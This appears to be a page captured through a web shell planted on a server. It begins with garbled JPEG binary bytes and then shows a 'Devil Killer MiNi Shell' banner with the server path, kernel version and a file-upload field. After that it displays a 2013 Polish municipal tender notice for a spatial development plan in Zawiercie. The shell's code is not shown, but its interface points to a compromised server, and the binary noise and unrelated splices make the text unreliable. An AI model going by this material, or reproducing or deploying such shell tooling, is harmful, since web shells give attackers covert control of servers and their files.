JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/531444-N-2013.html

<p class="kh_header"><b>Zawiercie: Sporządzenie projektu miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących część południowo-zachodnią i śródmieście.</b><br>
<b>Numer ogłoszenia: 531444 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie projektu miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących część południowo-zachodnią i śródmieście..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie projektu miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących część południowo-zachodnią i śródmieście,  w granicach terenów określonych w załączniku graficznym do uchwały nr XLI/398/13 Rady Miejskiej w Zawierciu z dnia 30 października 2013 r., z zachowaniem celów i kierunków rozwoju przestrzennego Gminy Zawiercie, określonych w uchwalonym uchwałą Nr XXXVIII/349/13 Rady Miejskiej w Zawierciu z dnia 7 sierpnia 2013r. Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Zawiercia.
Przedmiot zamówienia powinien być wykonany zgodnie z przepisami ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (t. j. Dz. U. z 2012 r., poz. 647 z późn. zm.) i aktów wykonawczych do tej ustawy, w tym rozporządzenia Ministra Infrastruktury z dnia z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. z 2003r. Nr 164, poz. 1587), a także zgodnie z przepisami odrębnymi odnoszącymi się do planowania i zagospodarowania przestrzennego, wraz ze sporządzeniem opracowania ekofizjograficznego, zgodnie z przepisami rozporządzenia Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz. U. z 2002 r. Nr 155, poz. 1298), prognozy oddziaływania na środowisko oraz przeprowadzeniem strategicznej oceny oddziaływania na środowisko dla ww. planu, zgodnie przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2013 r., poz. 1235). Przedmiot zamówienia obejmuje utworzenie metadanej infrastruktury informacji przestrzennej, o której mowa w art.  5 i w art. 29 ustawy z dnia 4 marca 2010 r. o infrastrukturze informacji przestrzennej (Dz.U. z 2010 r., Nr 76, poz. 489 z późn. zm.).                             
Wzór umowy i harmonogram realizacji przedmiotu umowy stanowią załączniki do SIWZ.
Opracowanie projektu miejscowego planu winno być poprzedzone wariantowymi koncepcjami terenu objętego opracowaniem, które podlegać będą akceptacji Zamawiającego. Przedmiot zamówienia obejmuje udział w czynnościach związanych ze sporządzeniem projektu miejscowego planu: przygotowanie wzorów dokumentów formalno-prawnych związanych ze sporządzaniem projektu planu, dyżury projektanta podczas wyłożenia projektu do publicznego wglądu (2 razy w tygodniu), udział w dyskusji publicznej, udział w spotkaniach merytorycznych w siedzibie Zamawiającego dot. przedmiotu wykonywanych prac, udział w posiedzeniach Komisji Rady Miejskiej oraz w posiedzeniach Gminnej Komisji Urbanistyczno-Architektonicznej dot. przedmiotu zamówienia w terminach wyznaczonych przez Zamawiającego, wprowadzenie w projekcie planu zmian wynikających z uzgodnień i rozpatrzonych uwag złożonych do wyłożonego do publicznego wglądu projektu planu, uczestniczenie w sesji Rady Miejskiej, podczas której podejmowana będzie uchwała w sprawie miejscowego planu.
Wymagane jest opracowanie przedmiotu zamówienia etapami - zgodnie z harmonogramem prac projektowych, stanowiącym załącznik do umowy. 
Każdy etap opracowania będący przedmiotem odbioru powinien zostać przedłożony Zamawiającemu w wersji papierowej  (2 egzemplarze) i elektronicznej na płycie CD/DVD. Przy składaniu częściowych protokołów przekazania prac, Wykonawca zobowiązany jest każdorazowo do wyszczególnienia w protokole, jakie prace są przedmiotem przekazania (zgodnie z harmonogramem).
Powierzchnia opracowania: około 800,0 ha
Skala opracowania: 1 : 2000
Termin wykonania: do 18 miesięcy od daty podpisania umowy
Specyfika terenu objętego opracowaniem: 
Obszar będący przedmiotem opracowania miejscowego planu o łącznej powierzchni około 800,0 ha, określony został w załączniku do uchwały nr XLI/398/13 Rady Miejskiej w Zawierciu z dnia 30 października 2013 r. udostępnionej w Biuletynie Informacji Publicznej na stronie internetowej www.zawiercie.eu.
Obszar objęty opracowaniem projektu planu lokalizowany jest w południowo - zachodniej części miasta Zawiercie wraz z jego centralną częścią. Teren w granicach opracowania jest w znacznym stopniu zabudowany i zainwestowany. Na obszarze tym występuje zabudowa mieszkaniowa jednorodzinna, wielorodzinna, mieszkaniowo-usługowa, usługowa, produkcyjna, produkcyjno-usługowa. Teren śródmieścia obejmuje ukształtowane historycznie centrum Zawiercia o funkcji mieszkaniowej i usługowej, w tym usługi ogólnomiejskie. Pełni ono funkcje reprezentacyjne, skupia najważniejsze w mieście obiekty służące mieszkańcom i przyjezdnym.
Część terenu jest niezainwestowana, ale zgodnie z obowiązującymi miejscowymi planami zagospodarowania przestrzennego są to tereny upraw polowych oraz zieleni, w tym zieleni urządzonej, które pełnią funkcję przestrzeni publicznej. 
Istniejącą infrastrukturę techniczną stanowią sieci: elektroenergetyczne średniego i wysokiego napięcia, wodno-kanalizacyjna, gazowa, teletechniczna. Przedmiotowy teren jest skomunikowany. 
2.Zakres opracowania przedmiotu zamówienia:
X wykonanie inwentaryzacji urbanistycznej i oceny istniejącego stanu zagospodarowania przestrzennego - opracowanie syntezy w formie opisowej i graficznej,
X sporządzenie opracowania ekofizjograficznego, o którym mowa w art. 72 ust. 4 i 5 obowiązującej ustawy z dnia 27 kwietnia 2001r. - Prawo ochrony środowiska (t.j. Dz.U. z 2013r., poz. 1232.), zgodnie z przepisami rozporządzenia Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz.U. z 2002 r. Nr 155, poz. 1298),
X przygotowanie wstępnej koncepcji przeznaczenia terenów oraz określenie sposobów ich zagospodarowania i zabudowy na obszarze opracowania, zgodnie z uchwałą nr XLI/398/13 Rady Miejskiej w Zawierciu z dnia 30 października 2013 r. i przedstawienie opracowanych materiałów do akceptacji Zamawiającemu, 
X sporządzenie projektu  planu z uwzględnieniem uwag Zamawiającego, zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164, poz. 1587),
X sporządzenie prognozy oddziaływania na środowisko ustaleń planu miejscowego, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (t.j. Dz.U. z 2013 r., poz. 1235), poprzedzone uzgodnieniem, z właściwymi organami, zakresu i stopnia szczegółowości informacji w niej zawartych, zgodnie z wymogami cytowanej ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko,
X sporządzenie prognozy skutków finansowych uchwalenia planu miejscowego z uwzględnieniem art. 36 wyżej cytowanej ustawy o planowaniu  i zagospodarowaniu przestrzennym, zgodnie z § 11 cytowanego rozporządzenia  w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
X skompletowanie dokumentacji prac planistycznych zgodnie z § 12 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
X Wykonawca zobowiązany jest do: udziału w spotkaniach roboczych i posiedzeniach komisji Rady Miejskiej dotyczących projektu planu, prezentacji projektu planu Gminnej Komisji Urbanistyczno-Architektonicznej, Komisji Polityki Przestrzennej i Ochrony Środowiska Rady Miejskiej w Zawierciu, podczas publicznej dyskusji na temat przyjętych w projekcie planu rozwiązań oraz podczas sesji Rady Miejskiej, w terminach wskazanych przez Zamawiającego,
X Wykonawca zobowiązany jest do udzielania Zamawiającemu pisemnych wyjaśnień dotyczących przyjętych w projekcie planu rozwiązań, a w szczególności pisemnego uzasadnienia powodu nieuwzględnienia uwag przekazywanych przez Zamawiającego do sporządzanego projektu planu,
X w przypadku stwierdzenia przez organ nadzorczy lub Sąd nieważności uchwały - Wykonawca zobowiązany jest do wykonania czynności związanych z usunięciem wad opracowania i doprowadzeniem uchwały do zgodności z przepisami prawnymi, bez dodatkowego wynagrodzenia,
X utworzenie metadanej infrastruktury informacji przestrzennej, o której mowa w art. 5  i w art. 29 ustawy z dnia 4 marca 2010 r. o infrastrukturze informacji przestrzennej (Dz.U. z 2010 r. Nr 76, poz. 489 z późn. zm.).
W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do uczestnictwa w przeprowadzeniu pełnej procedury dotyczącej uchwalenia planu, wynikającej z ustawy o planowaniu i zagospodarowaniu przestrzennym wraz z przeprowadzeniem strategicznej oceny oddziaływania na środowisko dla planu, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (t.j. Dz.U. z 2013 r., poz. 1235) oraz do opracowania wszelkich dokumentów wynikających z procedur związanych ze sporządzeniem planu, w tym:
X sporządzenie opracowania ekofizjograficznego, które powinno zawierać część opisową oraz kartograficzną zgodnie z problematyką określoną w rozporządzeniu Ministra Środowiska z dnia 9 września 2002r. w sprawie opracowań ekofizjograficznych (Dz. U. z 2002 r. Nr 155, poz. 1298),
X wykonanie analizy wniosków złożonych  przed ogłoszeniem/obwieszczeniem i po ogłoszeniu/obwieszczeniu o przystąpieniu do sporządzenia miejscowego planu i opracowanie propozycji ich rozpatrzenia,
X opracowanie koncepcji projektu planu, uwzględniającej oczekiwania gminy i jej prezentacja władzom gminy,
X opracowanie projektu planu z uwzględnieniem uwag Zamawiającego, złożonych do koncepcji,
X opracowanie prognozy skutków finansowych uchwalenia planu,
X przeprowadzenia strategicznej oceny oddziaływania na środowisko,
X opracowanie prognozy oddziaływania na środowisko, po uzgodnieniu z właściwymi organami stopnia szczegółowości informacji w niej zawartych, zgodnie z wymogami ustawy z dnia 3.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (t.j. Dz.U. z 2013 r., poz. 1235),
X przedstawienie projektu planu wraz z całą dokumentacją do zaopiniowania Gminnej Komisji Urbanistyczno-Architektonicznej (dalszej procedurze poddawany będzie projekt planu pozytywnie zaopiniowany przez GKU-A),
X przygotowanie projektu wystąpienia o zaopiniowanie projektu planu wraz z rozdzielnikiem oraz kopiami projektu planu i prognozy oddziaływania na środowisko,
X przygotowanie projektu wystąpienia o uzgodnienia wraz z rozdzielnikiem oraz kopiami projektu  planu i prognozy oddziaływania na środowisko,
X opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach,
X wprowadzenie zmian do projektu planu wynikających z uwzględnionych uwag zawartych w opiniach i zmian wynikających z dokonanych uzgodnień, w sposób ustalony z władzami gminy,
X opracowanie zmiany prognozy oddziaływania na środowisko, w związku ze zmianami w projekcie zmiany planu,
X opracowanie zmiany prognozy skutków finansowych uchwalenia planu, w związku ze zmianami w projekcie zmiany planu,
X opracowanie projektów ogłoszenia prasowego i obwieszczenia o wyłożeniu projektu planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu,
X obsługa wyłożenia projektu planu (dwa razy w tygodniu),
X zorganizowanie oraz udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami i sporządzenie protokołu z tej dyskusji,
X sporządzenie wykazu uwag wniesionych do wyłożonego do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, analiza tych uwag i opracowanie propozycji ich rozpatrzenia,
X udział w spotkaniach roboczych i posiedzeniach komisji Rady Miejskiej dotyczących rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, w terminach wyznaczonych przez Zamawiającego,
X wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag wniesionych po wyłożeniu projektu planu do publicznego wglądu,
X przedstawienie Radzie Miejskiej projektu planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu projektu planu do publicznego wglądu,
X ponowne przeprowadzenie czynności określonych w art. 17 ustawy o planowaniu i zagospodarowaniu przestrzennym, jeżeli Zamawiający stwierdzi konieczność dokonania zmian, w zakresie niezbędnym do dokonania tych zmian (przygotowanie projektu wystąpienia o ponowne zaopiniowanie i o ponowne uzgodnienia wraz z rozdzielnikiem oraz kopiami projektu planu i prognozy oddziaływania na środowisko, opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach, wprowadzenie zmian do projektu planu, odpowiednio do uwzględnionych uwag zawartych w uzasadnionych prawnie stanowiskach podmiotów uzgadniających, w sposób ustalony z władzami gminy, wyłożenie projektu planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu, przeprowadzenie dyskusji publicznej itd.) i ponowne przedstawienie Radzie Miejskiej projektu planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu projektu planu do publicznego wglądu,
X przygotowanie potrzebnej ilości materiałów roboczych - odpowiedniej m.in. do uzgodnień, opinii, konsultacji,
X przygotowanie projektu rozstrzygnięcia o sposobie realizacji zapisanych w projekcie planu inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz zasadach ich finansowania,
X przygotowanie uzasadnienia i podsumowania, o których mowa w art. 43 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (t.j. Dz.U. z 2013 r., poz. 1235),
X skompletowanie dokumentacji prac planistycznych zgodnie z § 12 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego - 2 kpl. (oryginał i kopia),
X przygotowanie projektu wystąpienia do Wojewody w sprawie oceny zgodności z przepisami prawnymi uchwały Rady Miejskiej wraz z załącznikami,
X przygotowanie wystąpienia do Starosty, Regionalnego Dyrektora Ochrony Środowiska i Państwowego Powiatowego Inspektora Sanitarnego przekazującego uchwalony plan miejscowy,
X utworzenie metadanej infrastruktury informacji przestrzennej, o której mowa w art. 5 i w art. 29 ustawy z dnia 4 marca 2010 r. o infrastrukturze informacji przestrzennej (Dz.U. z 2010 r. Nr 76, poz. 489 z późn. zm.).
Wykonawca zobowiązany jest wykonać i przekazać Zamawiającemu przedmiot zamówienia w tradycyjnej formie papierowej w następującej liczbie egzemplarzy:
a)tekst  planu wraz z załącznikami - 10 oprawionych egzemplarzy;
b)rysunek planu - 12 egzemplarzy z naniesionymi granicami ewidencyjnymi działek, w tym  2 egzemplarze dwustronnie zalaminowane,
c)pomniejszenie rysunku planu (skala do uzgodnienia z Zamawiającym) - 2 egzemplarze  z naniesionymi granicami ewidencyjnymi działek,
d)pomniejszenie rysunku planu (skala do uzgodnienia z Zamawiającym) - 1 egzemplarz  z naniesionymi granicami ewidencyjnymi działek dwustronnie zalaminowany,
e)opracowanie ekofizjograficzne - 2 oprawione egzemplarze,
f)prognoza skutków finansowych - 2 oprawione egzemplarze,
g)prognoza oddziaływania na środowisko - 5 oprawionych egzemplarzy.
Wykonawca zobowiązany jest wykonać i przekazać Zamawiającemu przedmiot umowy w wersji elektronicznej na nośniku optycznym - 5 płyt CD/DVD w następującym zakresie: 
a)przygotowanie tekstu uchwały wraz z załącznikami w wersji umożliwiającej publikację w Dzienniku Urzędowym Województwa Śląskiego (wprowadzenie projektu planu wraz  z załącznikami do Edytora Aktów Prawnych) - format xml,
b)tekst uchwały - w MS Word,
c)rysunek planu w postaci:  
X rastrowej w plikach o rozszerzeniu JPG, PDF i TIFF oraz Geo TIFF;
X wektorowej (aplikacje GIS i CAD) utworzonej zgodnie z przepisami ustawy z dnia 4 marca 2010r. o infrastrukturze informacji przestrzennej (Dz.U. z 2010 r. Nr 76, poz. 489 z późn. zm.)
z doprowadzeniem do poprawnego działania na sprzęcie i oprogramowaniu będącym w posiadaniu Zamawiającego w formatach plików - po uprzednim  uzgodnieniu z Zamawiającym,
d)prognoza skutków finansowych ustaleń zmiany planu - w MS Word, JPG,
e)opracowanie ekofizjograficzne - w MS Word, JPG,
f)prognoza oddziaływania na środowisko ustaleń zmiany planu - w MS Word, JPG,
g)metadaną infrastruktury informacji przestrzennej.
Wykonawca zobowiązany jest wykonać i przekazać Zamawiającemu 2 komplety dokumentacji prac planistycznych prowadzonych na potrzeby przedmiotu umowy, na podstawie oryginalnych dokumentów przekazanych przez Zamawiającego:
a)egzemplarz dla Wojewody (oryginał),
b)egzemplarz dla Urzędu Miejskiego w Zawierciu (kopia).
3.Zamawiający udostępni Wykonawcy:
X Mapy w postaci elektronicznej, o których mowa art. 16 ustawy z dnia 27 marca 2003 r.  o planowaniu i zagospodarowaniu przestrzennym (t. j. Dz. U. z 2012 r., poz. 647  z późn. zm.);     
X Uchwałę nr XLI/398/13 Rady Miejskiej w Zawierciu z dnia 30 października 2013 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących część południowo-zachodnią i śródmieście;
X Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Zawiercia uchwalone uchwałą nr XXXVIII/349/13 Rady Miejskiej  w Zawierciu z dnia  7 sierpnia 2013r. - w wersji elektronicznej,
Wyżej wymienione uchwały są dostępne na stronie internetowej www.zawiercie.eu - Biuletyn Informacji Publicznych Urzędu Miejskiego w Zawierciu - uchwały.
Inne materiały znajdujące się w posiadaniu Zamawiającego, a mogące służyć do opracowania przedmiotu zamówienia, Zamawiający udostępni na pisemny wniosek Wykonawcy.
Wszelkie inne materiały niezbędne do wykonania przedmiotu zamówienia, Wykonawca przygotuje i pozyska we własnym zakresie i na własny koszt (a ich koszt skalkuluje w cenie ofertowej).
4.Określony w specyfikacji termin wykonania przedmiotu zamówienia, to nieprzekraczalny termin pozytywnej oceny zgodności z przepisami prawnymi przez Wojewodę uchwały Rady Gminy w sprawie uchwalenia planu wraz załącznikami oraz dokumentacji prac planistycznych i przekazania uchwały do publikacji.
5.Zamawiający zastrzega, iż w przypadku negatywnej oceny przez Wojewodę zgodności z przepisami prawnymi uchwały (wraz z załącznikami) Rady Miejskiej w sprawie uchwalenia planu oraz dokumentacji prac planistycznych, na Wykonawcy ciąży obowiązek usunięcia wszelkich wad pod rygorem konsekwencji niewykonania przedmiotu zamówienia w terminie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 5.000,00 zł.
2.Wadium musi obejmować cały okres związania ofertą, zgodnie z postanowieniami punktu IX SIWZ i może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto: 
URZĄD MIEJSKI w ZAWIERCIU
BANK Pekao S.A.
KONTO: 74 1240 2975 1111 0010 4312 6805
z dopiskiem: Wadium - Sporządzenie projektu miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących część południowo-zachodnią i śródmieście.
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku zamawiającego.
4.Wadium wnoszone w innych niż pieniądz formach tj:  
1)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym;
2)gwarancjach bankowych;
3)gwarancjach ubezpieczeniowych,
4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z  późn. zm.)
- należy złożyć w oryginale najpóźniej wraz z ofertą (oryginał gwarancji/poręczenia powinien być umieszczony w ofercie w sposób umożliwiający jego zwrot zgodnie z ustawą Pzp).
5.Wadium wniesione w formach, o których mowa w pkt VIII ust. 4 SIWZ musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę określone w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
W szczególności zgodnie z art. 46 ust. 4a Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w pkt VI SIWZ lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
